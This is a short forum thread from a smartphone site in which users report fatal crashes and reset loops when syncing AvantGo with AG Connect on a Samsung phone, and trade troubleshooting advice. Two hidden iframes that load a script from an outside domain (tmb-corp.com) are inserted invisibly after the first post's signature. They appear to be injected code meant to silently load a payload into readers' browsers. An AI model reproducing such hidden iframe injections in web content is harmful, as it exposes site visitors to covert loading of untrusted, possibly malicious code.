+ Reply to Thread
    smartphonecentral.com

Bad crash with AG Connect (3x)

Tonight I had my third Fatal Exception crash while synching Avant Go using the AG Connect application. After the fatal exception, a normal reset results in an out of range error, and then phone won't start. A soft reset gets me back up and running, but: No Internet apps will work at all.

The only fix for me is to wipe the phone clean and reinstall apps.

I plan on letting Avant Go and Samsung know. Just wanted to let all of you know as well. It's happened three times with exactly the same circustances. FYI.

--Jesse<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Same/Similar thing happened to me with Avantgo, only my phone got caught in a reset loop, where the only solution was to do a hard reset.

It normally wouldn't have been that big of a problem, as you can place your phone in the cradle and voila, everything is mostly back to the way it was. Only, I was traveling at the time, in another city, without my PC or docking cradle. And my trip itinerary was ON THE PALM. Opps. Teaches me to go without a hardcopy backup of my flight schedule!

Several people have complained about avantgo working with the I300, causing crashes/hard resets. In almost every instance, another app, such as a hack, was the culprit. Avantgo (connect)works just fine on my I300. You can see if indeed Avantgo is the problem by installing it on your I300 that you have just performed a hard reset on. If it works, you know the problem is something else. Obviously, back up your data before you do this.